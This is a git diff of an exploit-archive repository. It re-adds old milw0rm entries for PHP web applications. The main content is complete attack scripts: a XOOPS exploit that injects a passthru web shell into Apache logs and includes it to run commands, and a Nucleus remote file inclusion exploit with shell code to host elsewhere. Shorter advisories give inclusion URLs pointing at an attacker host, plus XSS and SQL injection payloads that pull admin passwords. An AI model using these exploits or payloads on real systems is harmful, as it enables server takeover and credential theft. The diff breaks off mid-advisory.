proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "[1] Injecting some code in log files ...\r\n\r\n"; -$CODE="*delim*<?php error_reporting(0);set_time_limit(0);passthru(\$_COOKIE[cmd]);die;?>"; -$packet="GET ".$p.$CODE." HTTP/1.0\r\n"; -$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: close\r\n\r\n"; -sendpacketii($packet); -sleep(1); - -//fill with possible locations... 
-$paths=array( -"../../../../../../../../../../var/log/httpd/access_log", -"../../../../../../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../../../../../../apache/logs/error.log", -"../../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../../logs/error.log", -"../../../../../../logs/access.log", -"../../../../../../../../../../etc/httpd/logs/acces_log", -"../../../../../../../../../../etc/httpd/logs/acces.log", -"../../../../../../../../../../etc/httpd/logs/error_log", -"../../../../../../../../../../etc/httpd/logs/error.log", -"../../../../../../../../../../var/www/logs/access_log", -"../../../../../../../../../../var/www/logs/access.log", -"../../../../../../../../../../usr/local/apache/logs/access_log", -"../../../../../../../../../../usr/local/apache/logs/access.log", -"../../../../../../../../../../var/log/apache/access_log", -"../../../../../../../../../../var/log/apache/access.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/www/logs/error_log", -"../../../../../../../../../../var/www/logs/error.log", -"../../../../../../../../../../usr/local/apache/logs/error_log", -"../../../../../../../../../../usr/local/apache/logs/error.log", -"../../../../../../../../../../var/log/apache/error_log", -"../../../../../../../../../../var/log/apache/error.log", 
-"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/log/error_log" -); - -$xpl= array ( - "misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=", - "index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]=" - ); - -for ($j=0; $j<=count($xpl)-1; $j++) -{ - for ($i=0; $i<=count($paths)-1; $i++) - { - $a=$i+2; - echo "[".$a."] Trying with: ".$xpl[$j].$paths[$i]."%00\r\n"; - $packet ="GET ".$p.$xpl[$j].$paths[$i]."%00 HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: cmd=".$cmd.";\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #debug - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"*delim*")) - { - echo "Exploit succeeded...\r\n"; - $temp=explode("*delim*",$html); - die($temp[1]); - } - } -} -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-05-21] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; + +/* + works with: + magic_quotes_gpc = Off + register_globals = On +*/ + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to xoops\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /xoops/ \r\n"; +echo "php ".$argv[0]." localhost /xoops/ ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +/* hi, back from my annual social engineering tour, this year in Milan ;) + welcome to this new 0day experience... + explaination: + + vulnerable code in mainfile.php at lines 94-96: + ... + if (!isset($xoopsOption['nocommon']) && XOOPS_ROOT_PATH != '') { + include XOOPS_ROOT_PATH."/include/common.php"; + } + ... 
+ + if register_globals = On you can overwrite $xoopsOption['nocommon'] var, to + skip common.php inclusion where $xoopsConfig['language'] and + $xoopsConfig['theme_set] are initialized, so, if magic_quotes_gpc=Off + you can include arbitrary files from local resources, ex., Apache log files: + + http://[target]/[path]/misc.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[language]=../../../../../../../../../../var/log/httpd/access_log%00 + http://[target]/[path]/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../../../../../../../../../../var/log/httpd/error_log%00 + + or, if avatar uploads are enabled: + + http://[target]/xoops/html/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../uploads/cavt44703c30d3dbf.jpg%00 + + this tool inject some php code in apache log files and try to launch commands + */ + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "[1] Injecting some code in log files ...\r\n\r\n"; +$CODE="*delim*<?php error_reporting(0);set_time_limit(0);passthru(\$_COOKIE[cmd]);die;?>"; +$packet="GET ".$p.$CODE." HTTP/1.0\r\n"; +$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: close\r\n\r\n"; +sendpacketii($packet); +sleep(1); + +//fill with possible locations... 
+$paths=array( +"../../../../../../../../../../var/log/httpd/access_log", +"../../../../../../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../../../../../../apache/logs/error.log", +"../../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../../logs/error.log", +"../../../../../../logs/access.log", +"../../../../../../../../../../etc/httpd/logs/acces_log", +"../../../../../../../../../../etc/httpd/logs/acces.log", +"../../../../../../../../../../etc/httpd/logs/error_log", +"../../../../../../../../../../etc/httpd/logs/error.log", +"../../../../../../../../../../var/www/logs/access_log", +"../../../../../../../../../../var/www/logs/access.log", +"../../../../../../../../../../usr/local/apache/logs/access_log", +"../../../../../../../../../../usr/local/apache/logs/access.log", +"../../../../../../../../../../var/log/apache/access_log", +"../../../../../../../../../../var/log/apache/access.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/www/logs/error_log", +"../../../../../../../../../../var/www/logs/error.log", +"../../../../../../../../../../usr/local/apache/logs/error_log", +"../../../../../../../../../../usr/local/apache/logs/error.log", +"../../../../../../../../../../var/log/apache/error_log", +"../../../../../../../../../../var/log/apache/error.log", 
+"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/log/error_log" +); + +$xpl= array ( + "misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=", + "index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]=" + ); + +for ($j=0; $j<=count($xpl)-1; $j++) +{ + for ($i=0; $i<=count($paths)-1; $i++) + { + $a=$i+2; + echo "[".$a."] Trying with: ".$xpl[$j].$paths[$i]."%00\r\n"; + $packet ="GET ".$p.$xpl[$j].$paths[$i]."%00 HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: cmd=".$cmd.";\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #debug + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"*delim*")) + { + echo "Exploit succeeded...\r\n"; + $temp=explode("*delim*",$html); + die($temp[1]); + } + } +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-05-21] diff --git a/platforms/php/webapps/1814.txt b/platforms/php/webapps/1814.txt index 1e2cae41d..305d69114 100755 --- a/platforms/php/webapps/1814.txt +++ b/platforms/php/webapps/1814.txt @@ -1,14 +1,14 @@ -Anomaly 1n The System presents -UBB.threads >= 6.4.x Remote File Inclusion - -founded by V4mu in 04/20/2006 - -URL: http://www.ubbcentral.com -Google dork: allinurl:"/ubbthreads/" - -exploit: -/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id - -contact: irc.gigachat.net #A1TS - -# milw0rm.com [2006-05-22] +Anomaly 1n The System presents +UBB.threads >= 6.4.x Remote File Inclusion + +founded by V4mu in 04/20/2006 + +URL: http://www.ubbcentral.com +Google dork: allinurl:"/ubbthreads/" + +exploit: +/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id + +contact: irc.gigachat.net #A1TS + +# milw0rm.com [2006-05-22] diff --git a/platforms/php/webapps/1816.php b/platforms/php/webapps/1816.php index bae1c5017..80cfd5238 100755 --- a/platforms/php/webapps/1816.php +++ b/platforms/php/webapps/1816.php 
@@ -1,192 +1,192 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "Nucleus <= 3.22 arbitrary remote inclusion exploit\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; -echo "this is called the \"deadly eyes of Sun-tzu\"\r\n"; -echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top\r\n\r\n"; -/* -works with: -register_globals=Om -allow_url_fopen=Om -*/ - -if ($argc<5) { -echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to Nucleus\r\n"; -echo "location: an arbitrary location with the code to include\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ cat ./../../config.php\r\n"; -echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / http://somehost.com/ ls -la -P1.1.1.1:80\r\n\r\n"; -echo "note, you need this code in http://somehost.com/ADMIN.php/index.html\r\n"; -echo "<?php\r\n"; -echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n"; -echo "ini_set(\"max_execution_time\",0);\r\n"; -echo "echo \"*delim*\";\r\n"; -echo "passthru(\$_REQUEST[\"cmd\"]);\r\n"; -echo "echo \"*delim*\";\r\n"; -echo "?>\r\n"; -die; -} - -/* software site: http://nucleuscms.org/ - - i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49: - - ... 
- global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES, $HTTP_SESSION_VARS; -$aVarsToCheck = array('DIR_LIBS'); -foreach ($aVarsToCheck as $varName) -{ - if (phpversion() >= '4.1.0') - { - if ( isset($_GET[$varName]) - || isset($_POST[$varName]) - || isset($_COOKIE[$varName]) - || isset($_ENV[$varName]) - || isset($_SESSION[$varName]) - || isset($_FILES[$varName]) - ){ - die('Sorry. An error occurred.'); - } - } else { - if ( isset($HTTP_GET_VARS[$varName]) - || isset($HTTP_POST_VARS[$varName]) - || isset($HTTP_COOKIE_VARS[$varName]) - || isset($HTTP_ENV_VARS[$varName]) - || isset($HTTP_SESSION_VARS[$varName]) - || isset($HTTP_POST_FILES[$varName]) - ){ - die('Sorry. An error occurred.'); - } - } -} - -include($DIR_LIBS . 'ADMIN.php'); -... - -so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote inclusion, poc: - -http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://somehost.com/&cmd=ls%20-la - -where on somehost.com we have some php code in - -http://somehost.com/ADMIN.php/index.html - -also, if register_globals = On & magic_quotes_gpc = Off: - -http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/var/log/httpd/access_log%00&cmd=ls%20-la - - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, 
$proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; - -} -$host=$argv[1]; -$path=$argv[2]; -$loc=urlencode($argv[3]); -if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) -{die("Check the path, it must begin and end with a trailing slash\r\n");} -$port=80; -$proxy=""; -$cmd=""; -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{ -$cmd.=" ".$argv[$i]; -} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} - -$packet ="GET ".$p."nucleus/libs/PLUGINADMIN.php HTTP/1.0\r\n"; -$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"; -$packet.="Host: ".$host."\r\n"; -//through cookies, it's the same, maybe can bypass some ids... -$packet.="Cookie: GLOBALS[DIR_LIBS]=".$loc."; cmd=".$cmd.";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); - -if (strstr($html,"*delim*")) -{ - echo "Exploit succeeded..."; - $temp=explode("*delim*",$html); - die("\r\n".$temp[1]."\r\n"); -} -//if you are here... -echo "Exploit failed...\r\n"; -?> - -# milw0rm.com [2006-05-23] +#!/usr/bin/php -q -d short_open_tag=on +<? 
+echo "Nucleus <= 3.22 arbitrary remote inclusion exploit\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; +echo "this is called the \"deadly eyes of Sun-tzu\"\r\n"; +echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top\r\n\r\n"; +/* +works with: +register_globals=Om +allow_url_fopen=Om +*/ + +if ($argc<5) { +echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to Nucleus\r\n"; +echo "location: an arbitrary location with the code to include\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ cat ./../../config.php\r\n"; +echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / http://somehost.com/ ls -la -P1.1.1.1:80\r\n\r\n"; +echo "note, you need this code in http://somehost.com/ADMIN.php/index.html\r\n"; +echo "<?php\r\n"; +echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n"; +echo "ini_set(\"max_execution_time\",0);\r\n"; +echo "echo \"*delim*\";\r\n"; +echo "passthru(\$_REQUEST[\"cmd\"]);\r\n"; +echo "echo \"*delim*\";\r\n"; +echo "?>\r\n"; +die; +} + +/* software site: http://nucleuscms.org/ + + i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49: + + ... + global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES, $HTTP_SESSION_VARS; +$aVarsToCheck = array('DIR_LIBS'); +foreach ($aVarsToCheck as $varName) +{ + if (phpversion() >= '4.1.0') + { + if ( isset($_GET[$varName]) + || isset($_POST[$varName]) + || isset($_COOKIE[$varName]) + || isset($_ENV[$varName]) + || isset($_SESSION[$varName]) + || isset($_FILES[$varName]) + ){ + die('Sorry. 
An error occurred.'); + } + } else { + if ( isset($HTTP_GET_VARS[$varName]) + || isset($HTTP_POST_VARS[$varName]) + || isset($HTTP_COOKIE_VARS[$varName]) + || isset($HTTP_ENV_VARS[$varName]) + || isset($HTTP_SESSION_VARS[$varName]) + || isset($HTTP_POST_FILES[$varName]) + ){ + die('Sorry. An error occurred.'); + } + } +} + +include($DIR_LIBS . 'ADMIN.php'); +... + +so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote inclusion, poc: + +http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://somehost.com/&cmd=ls%20-la + +where on somehost.com we have some php code in + +http://somehost.com/ADMIN.php/index.html + +also, if register_globals = On & magic_quotes_gpc = Off: + +http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/var/log/httpd/access_log%00&cmd=ls%20-la + + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; + +} +$host=$argv[1]; +$path=$argv[2]; +$loc=urlencode($argv[3]); +if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) +{die("Check the path, it must begin and end with a trailing slash\r\n");} +$port=80; +$proxy=""; +$cmd=""; +for ($i=4; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{ +$cmd.=" ".$argv[$i]; +} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} + +$packet ="GET ".$p."nucleus/libs/PLUGINADMIN.php HTTP/1.0\r\n"; +$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"; +$packet.="Host: ".$host."\r\n"; +//through cookies, it's the same, maybe can bypass some ids... +$packet.="Cookie: GLOBALS[DIR_LIBS]=".$loc."; cmd=".$cmd.";\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); + +if (strstr($html,"*delim*")) +{ + echo "Exploit succeeded..."; + $temp=explode("*delim*",$html); + die("\r\n".$temp[1]."\r\n"); +} +//if you are here... +echo "Exploit failed...\r\n"; +?> + +# milw0rm.com [2006-05-23] diff --git a/platforms/php/webapps/1817.txt b/platforms/php/webapps/1817.txt index 06067cb65..066150ac8 100755 --- a/platforms/php/webapps/1817.txt +++ b/platforms/php/webapps/1817.txt 
@@ -1,44 +1,44 @@ -################ DEVIL TEAM THE BEST POLISH TEAM ################# -#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities -#Find by Kacper (Rahim). -#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** -#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl -#################################################################### -#Docebo Site: http://www.docebocms.org -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -In All scripts: -[code] -require_once($GLOBALS['where_framework'].'/lib/lib.permission.php'); -require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.php'); -require_once($GLOBALS['where_framework'].'/lib/lib.lang.php'); -require_once($GLOBALS['where_framework'].'/lib/lib.template.php'); -require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.php'); -[/code] - -#DoceboCMS: - -http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code] - -#DoceboKms: - -http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code] - -http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code] - -#DoceboLms: - -http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code] - -#DoceboCore: - -http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code] - -#DoceboScs: - -http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code] - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -#The End ;-) -#Pozdro Dla wszystkich o których zapomnia.em ;-) - -# milw0rm.com [2006-05-23] +################ DEVIL TEAM THE BEST POLISH TEAM ################# +#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities +#Find by Kacper (Rahim). 
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** +#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl +#################################################################### +#Docebo Site: http://www.docebocms.org +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +In All scripts: +[code] +require_once($GLOBALS['where_framework'].'/lib/lib.permission.php'); +require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.php'); +require_once($GLOBALS['where_framework'].'/lib/lib.lang.php'); +require_once($GLOBALS['where_framework'].'/lib/lib.template.php'); +require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.php'); +[/code] + +#DoceboCMS: + +http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code] + +#DoceboKms: + +http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code] + +http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code] + +#DoceboLms: + +http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code] + +#DoceboCore: + +http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code] + +#DoceboScs: + +http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +#The End ;-) +#Pozdro Dla wszystkich o których zapomnia.em ;-) + +# milw0rm.com [2006-05-23] diff --git a/platforms/php/webapps/1818.txt b/platforms/php/webapps/1818.txt index 98e652118..7d04f0bb0 100755 --- a/platforms/php/webapps/1818.txt +++ b/platforms/php/webapps/1818.txt 
@@ -1,43 +1,43 @@ -################################################################################## -#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<# -################################################################################## -# # -# phpCommunityCalendar 4.0.3 Multiple Vulnerabilites # -# # -################################################################################## -#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>># -################################################################################## -# # -# author : X0r_1 # -# release : 23.05.06 # -# software : http://www.appideas.com/ # -# googledork : "Calendar programming by AppIdeas.com" filetype:php # -# # -################################################################################## - -XSS: - -http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script> - -http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script> - -http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><" - - -SQL Injections: - -http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/* - 